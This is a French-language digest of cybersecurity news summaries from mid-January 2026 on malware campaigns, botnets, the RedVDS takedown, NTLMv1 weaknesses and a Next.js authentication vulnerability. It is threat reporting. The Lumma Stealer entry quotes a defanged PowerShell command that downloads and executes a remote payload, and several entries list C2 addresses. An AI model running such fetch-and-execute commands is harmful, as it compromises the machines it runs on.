Selon Help Net Security (15 janvier 2026), la National Security Agency (NSA) publie les deux premiers documents de sa série Zero Trust Implementation Guidelines (ZIG), posant les bases d’une adoption par étapes alignée sur le Department of War CIO Zero Trust Framework. La série ZIG est pensée pour une adoption par phases et de manière modulaire. Chaque phase propose un ensemble défini d’étapes techniques et opérationnelles. Les organisations peuvent sélectionner les capacités adaptées à leur maturité et à leurs priorités, permettant une application incrémentale sans attendre un déploiement global unique 🧩. ...

Source : Acronis Threat Research Unit (TRU). Dans un billet technique du 15 janvier 2026, Acronis TRU documente une campagne ciblée livrant un nouveau backdoor DLL, LOTUSLITE, via une archive ZIP à thème géopolitique liée aux relations États-Unis–Venezuela, contre des entités gouvernementales/politiques américaines. Vue d’ensemble. La chaîne d’infection repose sur un exécutable légitime et une DLL malveillante cachée, avec DLL sideloading pour exécuter un implant C++. LOTUSLITE communique avec un C2 à IP codée en dur, offre des fonctions de télécommande (shell interactif, opérations fichiers, exfiltration basique) et met en place une persistance robuste. La campagne est jugée axée espionnage (et non financière), à portée limitée mais à impact potentiel élevé sur des cibles stratégiques. ...

Selon Black Lotus Labs (Lumen Technologies), l’opérateur a observé fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimenté par l’exploitation de services de proxy résidentiel. Lumen décrit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montée en puissance — En septembre 2025, Aisuru passe d’environ 50 000 à 200 000 bots/jour, corrélé à des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmés. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggèrent une interface de contrôle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

Source: billet signé par Brad Duncan (publié le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer présentant un comportement post-infection inhabituel qui génère une hausse continue de trafic vers un même domaine C2. Après l’exfiltration des données par Lumma Stealer, l’hôte Windows infecté récupère des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisées pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraînant des requêtes HTTPS répétées vers hxxps[:]//fileless-market[.]cc/. ...

Source: Mandiant (Threat Intelligence, 15 janvier 2026). Contexte: l’éditeur publie un vaste jeu de tables arc‑en‑ciel pour Net‑NTLMv1, visant à illustrer le risque immédiat de ce protocole obsolète et à favoriser sa dépréciation effective. Mandiant annonce la mise à disposition publique d’un dataset complet de tables arc‑en‑ciel Net‑NTLMv1, soulignant que ce protocole est insecure depuis plus de deux décennies. L’objectif est de faciliter pour les défenseurs la démonstration concrète de la faiblesse de Net‑NTLMv1 (sans ESS) via une attaque par texte clair connu sur le texte « 1122334455667788 », garantissant la récupération du matériel de clé (lié au hash de mot de passe AD) et potentiellement une escalade de privilèges. ...

Source : BleepingComputer — Microsoft a annoncé avoir perturbé RedVDS, une plateforme cybercriminelle de « virtual desktop » (VDS) opérant depuis 2019, via des actions civiles aux États‑Unis et au Royaume‑Uni et une opération internationale conduite avec Europol et les autorités allemandes. RedVDS fonctionnait comme un Cybercrime-as-a-Service vendant des serveurs Windows en cloud avec droits administrateur et sans limites d’usage pour environ 24 $/mois. La plateforme a été utilisée par plusieurs groupes de menace, dont Storm‑0259, Storm‑2227, Storm‑1575 et Storm‑1747, et son développeur/opérateur est suivi comme Storm‑2470. Microsoft a saisi l’infrastructure, mettant hors ligne le marketplace et le portail client. Deux co‑demandeurs se sont joints à l’action : H2‑Pharma (perte de 7,3 M$ via BEC) et l’association Gatehouse Dock Condominium en Floride (près de 500 000 $). ...

Source: Microsoft (Digital Crimes Unit) — Microsoft annonce une action juridique coordonnée aux États-Unis et, pour la première fois, au Royaume‑Uni, appuyée par des autorités allemandes et Europol, pour perturber RedVDS, un service d’abonnement fournissant des ordinateurs virtuels jetables utilisés dans des fraudes massives. L’opération a permis la saisie d’infrastructures clés et la mise hors ligne de la place de marché RedVDS. RedVDS s’inscrit dans l’écosystème cybercrime-as-a-service en offrant, dès 24 USD par mois, des machines virtuelles discrètes et éphémères fonctionnant avec des logiciels non licenciés, dont Windows. Ce service a été massivement exploité pour envoyer des campagnes de phishing à haut volume, héberger de l’infrastructure de scam, et faciliter des fraudes assistées par IA générative (face swap, manipulation vidéo, clonage de voix). En un mois, plus de 2 600 VM RedVDS ont expédié en moyenne 1 million d’e‑mails de phishing par jour vers des clients Microsoft (sur les 600 millions d’attaques bloquées quotidiennement), contribuant depuis septembre 2025 à plus de 191 000 compromissions ou accès frauduleux d’organisations. ...

Selon l’extrait d’actualité du 16 janvier 2026, Moxie Marlinspike (créateur de Signal) lance Confer, un assistant IA privé et open source misant sur le chiffrement de bout en bout et un environnement d’exécution de confiance (TEE) pour protéger les conversations. Le contexte évoque les risques de stockage centralisé des chatbots grand public et rappelle une ordonnance de juin 2025 imposant à OpenAI de conserver indéfiniment les conversations de ChatGPT, alimentant la défiance. Le billet de blog de Confer et des échanges avec Ars Technica sont cités. ...

Dans un billet technique publié le 14 janvier 2026, l’auteur détaille une méthode permettant à un adversaire de forger des cookies d’authentification pour des applications Next.js utilisant NextAuth/Auth.js, en s’appuyant sur la vulnérabilité React2Shell (CVE-2025-55182). Le contexte décrit que l’exploitation de React2Shell peut laisser très peu de traces et permettre à un attaquant d’exfiltrer des variables d’environnement, notamment des identifiants OAuth et surtout le secret d’application de NextAuth (NEXTAUTH_SECRET/AUTH_SECRET). L’article souligne que la rotation des seuls secrets OAuth est insuffisante : le secret NextAuth est la clé pour chiffrer et authentifier les cookies de session. ...

Selon BleepingComputer, la Cour d’appel d’Amsterdam a confirmé la condamnation d’un homme de 44 ans à 7 ans de prison pour piratage informatique, facilitation d’importation de drogue (210 kg de cocaïne), et tentative d’extorsion, tout en le relaxant d’un chef lié à une tentative d’importation de 5 000 kg. Son appel, fondé sur la contestation de l’interception de communications chiffrées via Sky ECC, a été rejeté. 🧑‍💻 Modus operandi: l’individu a compromis les serveurs des ports de Rotterdam, Barendrecht et Anvers (Pays-Bas/Belgique) en s’appuyant sur des employés qui inséraient des clés USB infectées. Cela lui a permis d’implanter un outil d’accès à distance (RAT) dans les systèmes internes, d’exfiltrer des données de bases de données et d’intercepter des données en transit. ...